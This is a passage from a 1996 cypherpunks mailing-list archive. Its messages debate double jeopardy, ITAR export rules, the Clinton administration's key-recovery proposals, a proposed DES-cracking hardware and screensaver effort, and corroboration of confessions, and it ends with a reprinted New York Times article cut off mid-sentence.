the peace and dignity of both and may be prosecuted and punished by each."

Where an act violates both federal and state law, both the federal and
state governments think they get an opportunity to prosecute. Thus, racial
violence or murder which violates state assault or homicide laws gets a
state prosecution; and where it also violates federal civil rights laws (18
USC 241 or 242) it is also prosecutable federally. Ditto for many drug
crimes. An act which does not violate federal law (say, jaywalking) cannot
be prosecuted federally; this limits the situations where multiple
sovereigns can lead to multiple prosecutions. (but with Congress expanding
federal criminal law ...) 

(There's an exception to the dual sovereignty exception to the double
jeopardy clause, the "Bartkus exception", where the second prosecution is a
sham or a fake undertaken to serve the interests of the first sovereign;
but it's very hard to win a _Bartkus_ argument. Stacy Koon (one of the cops
convicted for the beating of Rodney King) tried to argue Bartkus and lost.)

Sorry for wandering off into legalpunks land but it's simply not the case
that the civil rights movement caused the erosion of the double jeopardy
clause, or that there's a magic "civil rights exception". Dual-sovereign
double jeopardy is alive & well in drug prosecutions today. Civil rights
just gets all of the press. 


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 2 Oct 1996 17:50:40 +0800
To: azur@netcom.com (Steve Schear)
Subject: Re: ITAR satellite provision
Message-ID: <3.0b28.32.19961002003934.006dcad8@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:31 PM 10/1/96 -0700, Steve Schear wrote:

>Does anyone on the list have the exact ITAR reg. text relating to the
>exemption for space-launched crypto?

I think you're talking about the definition of "export", located at 22 CFR
120.10:

     "Export means, for purposes of this subchapter:
      (a) Sending or taking defense articles out of the United States
    in any manner; or
      (b) Transferring registration or control to a foreign person of
    any aircraft, vessel, or satellite on the United States Munitions
    List, whether in the United States or abroad; or
      (c) Sending or taking technical data outside of the United States
    in any manner except by mere travel outside of the United States by
    a person whose personal knowledge includes technical data; or
      (d) Disclosing or transferring technical data to a foreign
    person, whether in the United States or abroad; or
      (e) The performance of a defense service on behalf of, or for the
    benefit of, a foreign person, whether in the United States or
    abroad.
*   A launch vehicle or payload shall not, by reason of the launching
*   of such vehicle, be considered an export for purposes of this
*   subchapter.  Most of the requirements of this subchapter relate
    only to exports, as defined above.  However, for certain limited
    purposes, the controls of this subchapter apply to sales and other
    transfers of defense articles and defense services (see, e.g., Sec.
    126.1) of this subchapter."


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 2 Oct 1996 13:14:02 +0800
To: stewarts@ix.netcom.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610011706.NAA14852@attrh1.attrh.att.com>
Message-ID: <Pine.LNX.3.94.961002004731.286A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 stewarts@ix.netcom.com wrote:

> Date: Tue, 01 Oct 1996 10:06:40 -0700
> From: stewarts@ix.netcom.com
> To: cypherpunks@toad.com
> Subject: Re: Clipper III on the table
> 
> Hip Hip Hooray!  Clinton will finally let us use _some_
> 20+year-old encryption code, which has been known to be relatively
> weak for 15 years, as long as we give them all our keys!  What a guy!
>

I have to point out that there is no "relative victory".  We have neither
won in whole nor in part.

> 
> I assume he's partly doing this to make a big "See, I'm in favor
> of high-tech trade and crime-fighting" push in time for the election,
>

If he even figures that out... he's probably doing it because some advisor
said it wouldn't make a difference to crypto, and that advisor would
basicly be right.

>
> and unlike RC4/40, cracking DES on general-purpose processors
> _is_ a big enough job that probably can't do a distributed crack
> in two weeks.  But still, get real - the NBS/NIST kept recertifying DES
> every 5 years only because it was in widespread use and there weren't
> good fast alternatives for the first couple of years (except triple-DES,
> which on the computers of the time was annoyingly slow.)  
>

Good point.

>
> There were far more powerful systems like Diffie-Hellman and later RSA 
> that were too slow for general use and are now fairly practical,
> but they're not letting us use them....
> 

Not _letting_ you?  Exactly which one is the government saying you _CAN'T_
use?  I've seen you can't export, you can't use in government work, etc...
but never once have I seen a law be _passed_ that said you couldn't use
any form of crypto (and I'd like to keep it that way)

> 
> #			Thanks;  Bill

 --Deviant
They seem to have learned the habit of cowering before authority even when
not actually threatened.  How very nice for authority.  I decided not to
learn this particular lesson.
                -- Richard Stallman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 2 Oct 1996 17:57:34 +0800
To: Ming-Ching Tiew <mctiew@csi.po.my>
Subject: RE: LivePGP (fwd)
In-Reply-To: <01BBB040.E21F05A0@minuet>
Message-ID: <Pine.SUN.3.94.961002031943.4404D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



In response to my point that refusing to release the source code of his
software will have the effect of discouraging its use by anyone with a
clue,

On Wed, 2 Oct 1996, Ming-Ching Tiew wrote:

> 
> While most certainly you are entitled to express whatsoever
> idea of yours and certainly the same applies to me.
> 

This goes without saying.

> I am most certainly not a crypto implementor, the entire
> cryptographic part of LivePGP relies on PGP. It is taken
> without a single line of change from the compiled executable,
> which source is available in full. So, the peer review and
> stuff are fully applicable.

Incorrect.  You have incorporated PGP in a new piece of software.  How are
we to know you took the code line for line unless we are able to verify
this claim?  Obviously, we cannot.

Your software is, therefore, untrustworthy.  This is not a matter simply
of my opinion.  This is basic doctrine in the development of crypto
software.  Ask anyone who knows what they are talking about.

Joe Average may be interested in your product, but no expert, or even
fairly knowledgeable individual, will ever take it seriously while the
source code remains private.

> I am also most certain that you will have a response to this
> view of mine. For whatever it is, I forsee that we will remain
> holding on to our own views. So, we should not carried on
> with this "discussion", for it will not be a productive work.

Your attitude distresses me and your ignorance of the importance of peer
review gives me pause when considering your potential skill as a crypto
programmer.

> Anyway thank you for a brief moment of interest in LivePGP
> which you have demonstrated. I really appreciate that.

Many of us would appreciate it if your, seemingly very useful software,
was also trustworthy enough to be used.


> Regards,
> Ming-Ching
>  
> ----------

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 2 Oct 1996 20:31:27 +0800
To: Steven L Baur <steve@miranova.com>
Subject: Re: Anonymous: Re: Phoenix News
In-Reply-To: <m2raniutwl.fsf@deanna.miranova.com>
Message-ID: <Pine.SUN.3.94.961002032616.4404E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On 1 Oct 1996, Steven L Baur wrote:

> >>>>> "Ralph" == Donald ``Ralph'' Wood writes to Perry Metzger:
> 
> Ralph> I do not object to criticism,  when I am wrong, but I do
> Ralph> object to using just highly subjective opinions to attack me,
> Ralph> or anyone for that matter.
> 
> The same Ralph of IPG who offered an unbreakable system or they would
> sell the company for $1?

I'll offer $0.25

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 2 Oct 1996 18:04:59 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Can we kill single DES?
In-Reply-To: <199610020201.TAA10143@mail.pacifier.com>
Message-ID: <199610020501.XAA14527@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610020201.TAA10143@mail.pacifier.com>, on 10/01/96 
   at 07:01 PM, jim bell <jimbell@pacifier.com> said:

-.Reluctantly, I'd have to say that I don't think this is a good idea.  If 
-.anything, what this would inadvertently demonstrate is how difficult (at 
-.least, with non-dedicated hardware) it is to crack DES. 

        basicly, we're proving that the Feds are a fraud, giving the
    public a gift of something that NSA can blow it away in real time.
    If the project is not ballyhoo'd when we're getting our act 
    together, and it goes underground when the team and fab is 
    ready to role, we won't have the Clinton-speak media taunting us,
    or screaming for our capture and obliteration....

        basically, shock is an effective  communicator, just like the
    networks find it necessary to hustle more bombings, more
    death and pain &C to get attention.  grab 'em by the short hairs
    and give them a good shake or two.

        we might even be perceived as a good, not evil force...  but
    I doubt it; the press mentality is too low.

        no, I certainly do not think hardware in particular is a bad 
    idea.  

-.I assume 
-.that it would be generally straighforward to build a cracking chip that 
-.tries 10 million keys per second, with a great deal of internal parallelism 
-.and pipelining.  
-.

-.Now, THAT sounds like a real threat!

        particulary if the design emphasizes unlimited linear extension!  

-.An even more ominous configuration would involve perhaps 50 
-.chips per full-length board, seven boards installed in a stripped-down  PC, 
-.which would produce a crack in 4 months average with one system alone.
-.
        without a doubt, this is the best approach, but you will find
    the chassis have a mix of ISA and PCI, or in some cases like I
    specify, they will be EISA and PCI .   

        I know where there is a 20 slot PCI passive backplane in a 
    rack mount for $350 and I think the vendor has P133 cards with 
    either 128 or 512 M 72 pin slots.  512M is about 4,000 smackaroos
    at this point.

        PCI is much easier to interface than ISA and you have the bus
    bandwidth to support the processor to co-processor transfer rates.

        I'm not going to go through the mental masturbation of what DSPs
    and FNGAs could manage in iterations/second until there is a firmer
    design, but 350 chain/parallel or tiered chips sounds like it might
    be more than 10% of the way to a terawhatever.
 
-.So how would all this be done?  First, write a serious proposal for the 
-.project and circulate it among companies with fab capacity.

        disagree, I would not even consider begging at the door of any
    charitable fab until the design, and probably the layout, is in 
    the can.  we might find it necessary to expand the trace depending
    on the capabilities of the offered facilty, thereby by burning 
    both more power, and reducing our yield per wafer.  

        secondly, circulating a proposal among the hungry pack is
    shopping around, which is almost always suicidal in raising money
    and finding manufacturing partners.  they all know each other, and
    you will end up with a "decision by commitee" and we know
    committees are always formed to absolve the participants of blame
    for failing to act, or whatever.

        on the other hand, I may personally have a rather strong 
    distaste for selected reviewing, but it does give a taker some-
    thing to crow about, that he was honoured to float this little 
    package....  part of this is getting to the 'good-feeling' state
    where the CEO thinks he will be a hero.

-.Likewise, find a politically-sympathetic designer with access to IC 
-.layout software, etc.

        that, and determining what form or methodology will optimize
    the design itself, are the two criticial first steps.  until that is 
    resolved,  nothing should be done; and get a provisional layout
    before finding the big sponser.  

-.The way I see it, there has to be a huge amount of 
-.unused 0.5-0.7 micron IC capacity around the world.
-.
        yes, in older fabs. but the < 1u lines are loaded as of the
    August summary.

-.Remember, we're only 
-.talking about a few hundred wafers.
-.
        the real issue is a working prototype --if it's ready to go,
    there should be no trouble persuading a fab to run a batch.
    I think the Tylan and Therm etchers are loading about 100
    six inch wafers and eight inch may be on line.  a six inch
    wafer has 27 sqin total and depending on the size of the 
    individual 

-.Anyway, the way I see it, you're probably going to burn up over a million 
-.dollars worth of ELECTRICITY alone on a single crack with Pentiums. 
-.
        4500 machines for $1M per year power?

-.Maybe Microsoft would be willing to help?  After all, it is THEY who are 
-.going to be limited to DES-strength exports if things continue as they've 
-.been going.

        you wish to hand over the project to Billy?  so all our good 
    designers are shunted off into never-never land as Billy stands 
    up in the spotlight and claims it was his brain, and the muscle he
    created in MicroSlop, who proved his boot sector virus and pretty
    programmer whupped the big bad government, who was trampling on
    our rights?  

            "I, and I mean 'I and my billions,' solved this trivial 
            DES problem, and I, and I mean 'I,' am the champion of 
            your god given rights as promised in the Bill of Rights."

        count me out; Billy and Big Ears are a perfect pair, they think
    they walk on the same water!   

-.How about Intel?

        well, at least Andy Grove would not pull a Bill Gates. however,
    Grove and company are very bottom line oriented and turn around
    has been proven to be pretty slow in most of their fab plants --but
    they have a special section of engineering knock-up.   I believe 
    both Silicon Gulch and Hillsboro have 'em. 

        the real issue will be to find a reason for Intel to be able 
    to mass produce the chip for something else --maybe use an FPGA
    type design, or a digital filtering processor architecture 
    --easier to correct small mistakes, too.  If the KISS principle is 
    used exclusively,  and mutiple step-and-repeats for the layouts,
    a large house like Intel could make real short work of it.

        one more round...
            --attila


--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Oct 1996 22:39:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <199610020332.UAA16659@mail.pacifier.com>
Message-ID: <Pine.GSO.3.95.961002040454.20910A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Just woke up -- got up early today to head to ACLU Supreme Court
briefing -- but it strikes me that receiving nonescrowed crypto
through the mail might be like receiving kiddie porn.

Import restrictions, of course, will come with mandatory domestic key
escrow.

-Declan


On Tue, 1 Oct 1996, jim bell wrote:

> Date: Tue, 01 Oct 1996 20:32:05 -0800
> From: jim bell <jimbell@pacifier.com>
> To: Declan McCullagh <declan@well.com>, cypherpunks@toad.com
> Subject: Re: White House crypto proposal -- too little, too late
> 
> At 02:57 PM 10/1/96 -0700, Declan McCullagh wrote:
> >
> >
> >---------- Forwarded message ----------
> >Date: Tue, 1 Oct 1996 14:56:21 -0700 (PDT)
> >From: Declan McCullagh <declan@well.com>
> >To: fight-censorship@vorlon.mit.edu
> >Subject: White House crypto proposal -- too little, too late
> [snip]
> >What's even more disturbing is what the administration might do
> >next. After the roundtable broke up, I chatted with Michael Vadis, one
> >of the assistant deputy attorneys general who oversees national
> >security issues. He said an international consensus is forming that
> >terrorists can use crypto; therefore crypto must be controlled. The
> >U.S. is certainly pushing this line at the OECD talks.
> >
> >"But it just takes one country to decide to export strong crypto," I said.
> >"You're missing something," said Vadis.
> >"What?" I asked. "Unless you're talking about import restrictions."
> >"Exactly," he said.
> >-Declan
> 
> 
> An import restriction would be even less effective than the current export 
> restrictions.  With an import restriction, a person need merely receive a 
> given piece of software in the mail from an "unknown" benefactor, software 
> that (surprise!) would have been illegal to import.  (the software doesn't 
> even have to be mailed from outside the US, merely trucked in by a wetback 
> and anonymously mailed by tossing it into the ubiquitous USnail PO Box.)   
> Redistribution of this software would have to be legal, if for no other 
> reason than nobody could prove it was imported illegally.  Nobody outside 
> the US would have any standing to sue for copyright violation, because they 
> couldn't import it and sell it without restrictions.
> 
> Jim Bell
> jimbell@pacifier.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 2 Oct 1996 19:08:15 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: "Confessing to a felony"
In-Reply-To: <3.0b19.32.19960928013142.0069aa3c@ricochet.net>
Message-ID: <Pine.SUN.3.94.961002044727.5810B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Sep 1996, Greg Broiles wrote:

> At 06:30 PM 9/27/96 -0800, Tim May wrote:
> >
> >Hearing me say I "exported crypto," a hearsay claim, and happening to find
> >one or more laptops at my home, weeks or months later, implies nothing.
> >Legal proof is still needed. Given only a nebulous statement like "I
> >exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
> >is not enough for a case even to be brought to trial.
> >
> >(If it reached trial, I would expect a defense attorney to move for
> >dismissal. Absent any evidence that a crime occurred, absent any proof
> >beyond the nebulous hearsay statement of a "braggart," there is simply no
> >basis for criminal action.)
> >
> >"Stupid bragging criminals" may be common, but bragging is not in and of
> >itself illegal. There still has to be evidence of a crime.
> >
> >"Produce the body."
> 
> I mostly agree re the "corpus delicti" rule (a confession must be
> corroborated by independent evidence that a crime has been committed,
> common law federally, statutory in Oregon (ORS 136.425(1)) but disagree
> with your use of "hearsay" - statements of a defendant in a criminal
> proceeding are not hearsay because they're the statements of a party
> opponent. (In federal court and in Oregon, anyway - in California they're
> hearsay but admissible as an exception. FRE 801(d)(2), ORE 801(4)(b), Cal
> Evid Code 1220.)  

In practice, its easier to use the statement against interest exception to
hearsay.


> I think the question of what *would* constitute the corpus delicti is
> interesting; the mere presence of PGP overseas shouldn't be enough. And
> evidence like PGP's presence on a laptop which had once been overseas, or
> airline ticket stubs or passport stamps or testimony from a security
> officer who remembered making the defendant turn on the laptop at the metal
> detector, or even surveillance camera footage would corroborate the
> defendant's confession but not establish that a crime was committed. Such
> evidence would seem to get us closer to the latter test mentioned in
> _Singleterry_ but wouldn't meet Oregon's test of "some other proof that the
> crime has been committed" (ORS 136.425) nor California's "the charged crime
> actually happened" (People v. Jennings (1991) 53 Cal.3d 334, 368) standard.
> But an ITAR prosecution would occur in Federal court, where evidence which
> merely corroborates the confession (instead of proving a crime) may be
> sufficient. 

Of course, going by this standard, it would also be difficult to prosecute
any crime involving, e.g., stock or wire transfers.  This is one reason
why the absolutist and the formalist schools of legal thought were
abandoned.

> (And, of course, this is all just so much jawboning. Not legal advice.
> I'm inclined to avoid confessing to crimes via the Internet whether or not
> it seems likely to lead to prosecution or conviction.

This is essentially my position, the esteemed objections of Mr. May noted
for the record.

> I've already been to
> one job interview where the employer had seen (and was unnerved) by my
> vocal presence on the net.(!?!) Which is OK with me because if I make
> someone nervous when they read Alta Vista, just wait until they meet me. :)
> It's time to get used to the idea that whatever we write may come back in
> 20 or 30 or 40 years, whether we like it or not. I think it'll teach us
> both a sense of forgiveness and a sense of discretion, but that may take
> awhile.) 

I think better discretion than reliance on the ability of others to learn
forgiveness.

Adopt a pseudonym, if you haven't already.  :)

> 
> --
> Greg Broiles                |  "We pretend to be their friends,
> gbroiles@netbox.com         |   but they fuck with our heads."
> http://www.io.com/~gbroiles |
>                             |
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 2 Oct 1996 19:54:04 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Confessing to a felony"
In-Reply-To: <v03007801ae7237ed7a65@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961002045232.5810C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, Timothy C. May wrote:

> At 5:43 PM -0400 9/27/96, Black Unicorn wrote:
> >On Thu, 26 Sep 1996, Timothy C. May wrote:
> 
> >His admission that he used the notebook.  Recovering the notebook and
> >finding the software.  Interviewing the Customs agent working at the time.
> 
> His admission that he used _which_ notebook? Chain of evidence again.
> 
> Finding _which_ software?
> 
> (As for the Customs agent, I can assure you that my luggage has never been
> checked upon either leaving the U.S. or entering the U.S. Even if U.S.
> Customs could figure out who was working at the time I putatively entered
> the country, and even if he remembered _me_, months later, just what
> records would he have, and how would they stand up in court?)

His testomony, which the prosecution would have reviewed with him (in so
far as it does not break the ethical line of reviewing and constructing of
course).

In the American system I think that many people who have not had experiece
watching juries and the lunacy that surrounds the process fall victim to
an effect the likes of which you described on the list some time ago.
"Best as the enemy of good."  I think is the way you phrased it.  Juries
are very good at pointing fingers at merely "decent" evidence.  Arguments
of the sort that are made here, while logically sound, and convincing to
me personally, will simply not be as effective in court.

I invite all the members of the list to go sit in on a trial at some time
or another and pay attention to evidence and how it really impacts juries.

> Hearing me say I "exported crypto," a hearsay claim,

Falling within at least two of the entrenched exceptions to hearsay
exclusion....

> and happening to find
> one or more laptops at my home, weeks or months later, implies nothing.

It implied a great deal.  It proves nothing.  Unfortunately you really
don't have to prove anything.  Reasonable inferences are enough.  I'm not
telling you how I think it should be, but rather how, in my experience, it
tends to work out in practice.  Add it to the video tape of the customs
area (with our poor defendant on camera turning on the laptop for security
to show them its not a bomb or something) and things get more and more
interesting.

It's all a matter of how much effort you want to put it to it.

If everyone is convinced that export controls will never be enforced, why
all the efforts to comply with ITAR on ftp sites and so forth?  Certainly
those are a lot more in the grey area than actually transporting the data
physically...?

> (To
> make the point graphically, suppose the raiding party finds _several_
> laptops or notebooks...do they assume _all_ were taken out of the country,
> or do they pick the one with the most incriminating software on it? Answer:
> Unless they can _prove_ one of them was used, and that it had not been
> _changed_ since the putative event (highly unlikely), they cannot simply
> _assume_ one of them was taken out.

Actually, given that in this case the defendant would have explicitly
claimed to have taken the software out on a laptop, all that would really
be needed to lend a bit of material to verify would be testimony by anyone
that he had a laptop of his own on the trip.

See the Klaus von Bulow bag for an example of how ownership and possession
and multiple items which all look alike don't really care 

> (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not
> the one I took to Europe."   "Oh, you say this laptop has PGP 5.9 on it?
> So? I installed it last week. My trip to Europe was last summer.")

"PGP isn't on here?  You destroyed evidence!"
Works both ways.  It doesn't help that he admitted to the crime to his
buddies on the evil conspiracy mailing list either.

> >Considering the headaches required for airline travel today, it's not like
> >there aren't serious records abound.
> 
> Such as? I recall no inspections of my luggage, no inventorying of the
> serial numbers of my laptops, no inspection whatsoever of my
> magneto-optical drives (which were in my carry-on luggage, and not even
> glanced at, in the box they were in).

I challenge you to find an airport today that will not hand inspect
laptops in checked bagage and either x-ray or hand inspect or both laptops
carried on.  I also challenge you to find an airport that does not keep
video tape records of their security areas.  If you do make sure to call
the FAA and report them as well.  I understand there is a reward for lax
security reports now.

> X-rays would not prove what was taken
> in or out of the country, even if "x-ray escrow" were implemented (which it
> is not, according to all reports I have heard, and based on some practical
> limits on storage), I doubt the records of a trip, say, last summer (of
> '95) could be retrieved and prove that a particular laptop was taken out.
> Not to mention that the software allegedly taken out might have been on any
> kind of media, none of them distinguishable with an x-ray machine.

All these speculations are idle where the defendant admitted to the means
he used to commit the crime.  Reasonable verification is all that is
required, and in some circumstances, not even that.

I'm not telling you he'd go away.  I am telling you that if I wanted to
prosecute the case, I'd make a very good run of it and without someone on
their toes, probably talk defendant into a plea deal.

> 
> >For crying outloud, he admitted to the world that he took the software
> >out.  I put that in front of a jury and it looks just like the typical
> 
> "For crying out loud" is bluster, not legal argument.

With respect, Mr. May, nothing you have presented is legal argument
either.

> >stupid bragging criminal.  Any defense about "I was just kidding" or "The
> >message was forged" might be interesting, but it will sound like
> >technical-mumbo-jumbo to a jury.  Yes, it would convince >ME< that was a
> 
> Legal proof is still needed.

Thats a reading of the law, not the dogma of a courtroom.

> Given only a nebulous statement like "I
> exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
> is not enough for a case even to be brought to trial.

In print, distributed to nearly 1500 people, I simply cannot agree.

> (If it reached trial, I would expect a defense attorney to move for
> dismissal. Absent any evidence that a crime occurred, absent any proof
> beyond the nebulous hearsay statement of a "braggart," there is simply no
> basis for criminal action.)

Disagree strongly.  I have seen jail terms for less.  Particularly where a
prosecutorial political motive was being served.

> "Stupid bragging criminals" may be common, but bragging is not in and of
> itself illegal. There still has to be evidence of a crime.

Merely enough to allow a jury to make a reasonable judgement to the
reliability of the confession.

> "Produce the body."
> 
> (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the
> body, or witnesses, does this mean I'll be found guilty? To use BU's
> phrasing, "for crying out loud.")

Comparing export regulations to murder investigation undercuts your
argument rather seriously.  I really suggest you spend some time in the
pragmatic world of the courtroom and watch exactly how the letter of the
law is put into practice.

> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frank@funcom.no (Frank Andrew Stevenson)
Date: Wed, 2 Oct 1996 16:56:44 +0800
To: trei@process.com
Subject: Re: Can we kill single DES?
In-Reply-To: <199610012026.NAA28151@toad.com>
Message-ID: <199610020527.HAA24482@odin.funcom.com>
MIME-Version: 1.0
Content-Type: text/plain


DES CRACKING SCREENSAVER

Sorry for writing twice, beside wanting to add that I might be able to do some
programming for a worthy cause, I just got a rather good idea to make a
screensaver unique and interesting ( making people want to burn cycles )
Picture this: the user upon installing the program points at his/her location on
a world map. This location is send to the keyserver, which sends back highly
compressed information about where other people are running their
"screensavers", the screensaver itself can simply display a rotating globe,
where the different densities of global usage is given in colour shades, showing
an inverse sunclock of sorts. I think such a concept might give the DES-cracking
screensaver a critical mass.

  frank






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Temple <dtemple@ashland.edu>
Date: Wed, 2 Oct 1996 22:45:09 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: This list is a joke
In-Reply-To: <9610012111.AA00547@ch1d157nwk>
Message-ID: <Pine.WNT.3.95.961002081520.241A-100000@test1>
MIME-Version: 1.0
Content-Type: text/plain


Actually, I am not adult enough to save the welcome message I received
when I joined the list.  Thanks to the many people who have since sent me
the instructions.  I am sorry I had to whine to get them.

> 
> I guess you are not adult enough to take yourself off the list.
> 
> 
> andrew
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <ben@EdelWeb.fr>
Date: Wed, 2 Oct 1996 19:06:03 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <199610020350.UAA08078@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.95.961002104055.14359l-100000@mercier.gctech.edelweb.fr>
MIME-Version: 1.0
Content-Type: text/plain


> I don't doubt that they can do this if they really want to, but I
> wonder what legal basis they will use for import restrictions.
> 
> Are there any current import restrictions for products on can legally
> manufacture, sell, and use in the United States?

While I'd wager that this would be a violation of GATT's competition
clause, since it would favor domestic firms over foreign ones, there is a
loophole in GATT for national security that could be invoked.

Ben.
____
Ben Samman.................................................ben@edelweb.fr
Paris, France                      Illudium Q36 Explosive Space Modulator






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "GOULDING CP" <Goulding-PC@ulst.ac.uk>
Date: Wed, 2 Oct 1996 20:41:10 +0800
To: cypherpunks@toad.com
Subject: unsubsribe
Message-ID: <379C9E71B7B@smserver1.ulst.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


unsubsribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 2 Oct 1996 23:04:23 +0800
To: cypherpunks@toad.com
Subject: NYT on IBM GAK
Message-ID: <199610021114.LAA20303@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 2, 1996, pp. D1, D8. 
 
 
   Compromise Is Offered on Computer Security Codes 
 
   By John Markoff 
 
 
   The Clinton Administration offered a compromise to the 
   computer industry yesterday by holding out the possibility 
   of removing all export restrictions on data-scrambling 
   technology for companies that accept a new approach to 
   allow law enforcement officials to unscramble coded 
   messages. The new system is being recommended by an 
   alliance led by I.B.M.. 
 
   The approach is to be announced today and has passed muster 
   with the Central Intelligence Agency. It would enable law 
   enforcement officials to unscramble computer communications 
   -- provided they have a warrant -- without having to obtain 
   a mathematical key to the code. 
 
   Instead, the agents could use the warrant to obtain the 
   cooperation of outside parties to help unscramble portions 
   of code accompanying a message. This information would then 
   allow law enforcement officials to draw mathematical 
   inferences enabling them to decipher the scrambled 
   messages. 
 
   By making it at least a two-step process to decipher a 
   scrambled, or encrypted, message, and by requiring the 
   cooperation of at least two outside parties designated by 
   the code users themselves, the approach is supposed to 
   address the main criticisms against data-scrambling systems 
   previously endorsed by the Government. 
 
   But some industry executives and privacy-rights advocates 
   said yesterday that the new approach would not satisfy 
   their objections to a Government-backed eavesdropping 
   system. Critics contend that any such system could 
   compromise the privacy of United States citizens and hinder 
   the ability of American high-technology companies to sell 
   their most sophisticated data-security products overseas. 
 
   Executives of the International Business Machines 
   Corporation said late yesterday that they were still lining 
   up the final list of companies in the alliance. Those 
   involved will include Digital Equipment and smaller 
   data-security companies including RSA Data Security, Cylink 
   and Trusted Information Systems. 
 
   The computer industry and the Clinton Administration, as 
   well as factions within the Administration, have been at an 
   impasse for years over export policy for data-scrambling 
   technology. Intelligence and law enforcement agencies, 
   fearing that such technology can be used by terrorists and 
   criminals to conspire with impunity, have insisted on a 
   system for cracking the coded messages under certain 
   circumstances. 
 
   Seeking to end the deadlock, I.B.M. set in motion the new 
   compromise earlier this year when it demonstrated its 
   experimental approach to the C.I.A. Director, John Deutsch. 
 
   Mr. Deutsch then took an active role in the internal 
   Administration debate, in which Justice Department and 
   F.B.I. officials had previously taken a hard line against 
   loosening export controls, according to several people 
   familiar with the talks. 
 
   In a public statement issued yesterday Vice President Al 
   Gore said that if the I.B.M. data-deciphering technology 
   proved workable, there would no longer be export 
   restrictions on the strength of the data-scrambling 
   technology or on the type of software algorithms -- or 
   mathematical formulas -- employed. 
 
   The Administration is calling the I.B.M. approach a "key 
   recovery" system. The designation is meant to distinguish 
   it from previously proposed "key escrow" systems, like one 
   called Clipper that the Government put forth a few years 
   ago. 
 
   In an escrow system, one or more Government or 
   private-industry escrow agents would hold keys for 
   unlocking coded messages, which could be used by 
   law-enforcement agents with a warrant. The drawbacks, 
   according to I.B.M., are that the storage of the keys can 
   become a record-keeping nightmare and can also make the 
   system vulnerable to unauthorized use of the keys. 
 
   The I.B.M. approach is intended to eliminate this 
   vulnerability by giving no third party an actual key to the 
   code. Instead, at least two "trusted agents" would be 
   required to help unscramble encrypted information in the 
   header of each message. Only after this portion of the 
   message is deciphered, I.B.M. said, would law-enforcement 
   agents be able to unscramble the contents of the message 
   itself by recreating the original key to the code. 
 
   "Our theory is this should work the same way as your filing 
   cabinet," said Kathy Kincaid, an I.B.M. computer security 
   executive. "You wouldn't give law enforcement the keys to 
   your filing cabinet unless they had a search warrant." 
 
   And yet, even one of the companies that I.B.M. is counting 
   on as an alliance member said yesterday that new approach 
   did not go far enough beyond the old Clipper plan, in terms 
   of privacy protection. 
 
   "The Government announcement is disastrous," said Jim 
